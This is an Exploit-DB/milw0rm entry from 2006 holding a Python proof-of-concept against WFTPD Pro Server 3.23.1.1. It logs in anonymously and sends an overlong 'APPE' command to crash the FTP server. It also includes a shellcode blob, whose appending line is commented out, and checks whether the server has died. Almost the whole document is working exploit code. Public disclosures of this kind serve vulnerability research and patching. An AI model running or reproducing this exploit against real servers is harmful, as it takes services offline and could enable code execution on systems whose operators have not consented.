WFTPD Pro Server 3.23.1.1 - 'APPE' Remote Buffer Overflow (PoC)

EDB-ID:

2734


Type:

dos


Platform:

Windows

Date:

2006-11-07


#!/usr/bin/env python

import sys
import struct
import ftplib

print "WFTPD Pro Server 3.23.1.1 Buffer Overflow (Only a DOS currently, simple POC)"
print "Copyright (c) Joxean Koret"
print

target = "192.168.1.13"
targetPort = "21"

try:
    ftp = ftplib.FTP()

    print "[+] Connecting to target "
    msg = ftp.connect(target, targetPort)
    print "[+] Ok. Target banner"
    print msg
    print
    print "[+] Trying to logging anonymously"
    msg = ftp.login() # Anonymous
    print "[+] Ok. Message"
    print msg
    print
except:
    print "[!] Exploit doesn't work. " + str(sys.exc_info()[1])
    sys.exit(0)


a = "\\\\A:"

for i in range(6):
    a += a

print "[+] Padding length " + str(len(a)) + " bytes"

b = "ABCD"

for i in range(4):
    b += b

a = a + "ABCD"*10 + b

shellCode = ""
shellCode += "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xec"
shellCode += "\x9b\x26\x8c\x83\xeb\xfc\xe2\xf4\x10\xf1\xcd\xc1\x04\x62\xd9\x73"
shellCode += "\x13\xfb\xad\xe0\xc8\xbf\xad\xc9\xd0\x10\x5a\x89\x94\x9a\xc9\x07"
shellCode += "\xa3\x83\xad\xd3\xcc\x9a\xcd\xc5\x67\xaf\xad\x8d\x02\xaa\xe6\x15"
shellCode += "\x40\x1f\xe6\xf8\xeb\x5a\xec\x81\xed\x59\xcd\x78\xd7\xcf\x02\xa4"
shellCode += "\x99\x7e\xad\xd3\xc8\x9a\xcd\xea\x67\x97\x6d\x07\xb3\x87\x27\x67"
shellCode += "\xef\xb7\xad\x05\x80\xbf\x3a\xed\x2f\xaa\xfd\xe8\x67\xd8\x16\x07"
shellCode += "\xac\x97\xad\xfc\xf0\x36\xad\xcc\xe4\xc5\x4e\x02\xa2\x95\xca\xdc"
shellCode += "\x13\x4d\x40\xdf\x8a\xf3\x15\xbe\x84\xec\x55\xbe\xb3\xcf\xd9\x5c"
shellCode += "\x84\x50\xcb\x70\xd7\xcb\xd9\x5a\xb3\x12\xc3\xea\x6d\x76\x2e\x8e"
shellCode += "\xb9\xf1\x24\x73\x3c\xf3\xff\x85\x19\x36\x71\x73\x3a\xc8\x75\xdf"
shellCode += "\xbf\xc8\x65\xdf\xaf\xc8\xd9\x5c\x8a\xf3\x37\xd0\x8a\xc8\xaf\x6d"
shellCode += "\x79\xf3\x82\x96\x9c\x5c\x71\x73\x3a\xf1\x36\xdd\xb9\x64\xf6\xe4"
shellCode += "\x48\x36\x08\x65\xbb\x64\xf0\xdf\xb9\x64\xf6\xe4\x09\xd2\xa0\xc5"
shellCode += "\xbb\x64\xf0\xdc\xb8\xcf\x73\x73\x3c\x08\x4e\x6b\x95\x5d\x5f\xdb"
shellCode += "\x13\x4d\x73\x73\x3c\xfd\x4c\xe8\x8a\xf3\x45\xe1\x65\x7e\x4c\xdc"
shellCode += "\xb5\xb2\xea\x05\x0b\xf1\x62\x05\x0e\xaa\xe6\x7f\x46\x65\x64\xa1"
shellCode += "\x12\xd9\x0a\x1f\x61\xe1\x1e\x27\x47\x30\x4e\xfe\x12\x28\x30\x73"
shellCode += "\x99\xdf\xd9\x5a\xb7\xcc\x74\xdd\xbd\xca\x4c\x8d\xbd\xca\x73\xdd"
shellCode += "\x13\x4b\x4e\x21\x35\x9e\xe8\xdf\x13\x4d\x4c\x73\x13\xac\xd9\x5c"
shellCode += "\x67\xcc\xda\x0f\x28\xff\xd9\x5a\xbe\x64\xf6\xe4\x1c\x11\x22\xd3"
shellCode += "\xbf\x64\xf0\x73\x3c\x9b\x26\x8c"

a = a + "JOXEAN" #+ shellCode

print "[+] Exploiting with a buffer of " + str(len(a)) + " byte(s) ... "

try:
    msg = ftp.sendcmd("APPE " + a)
    print "[!] Exploit doesn't work [" + msg + "]"
except:
    print "[+] Exploit apparently works. Trying to verify it ... "

    try:
        ftp.connect(target, targetPort)
        print "[!] No, it doesn't work [" + str(sys.exc_info()[1]) + "] :("
    except:
        print "[!] Ok. Server is dead, exploit successfully executed. "

# milw0rm.com [2006-11-07]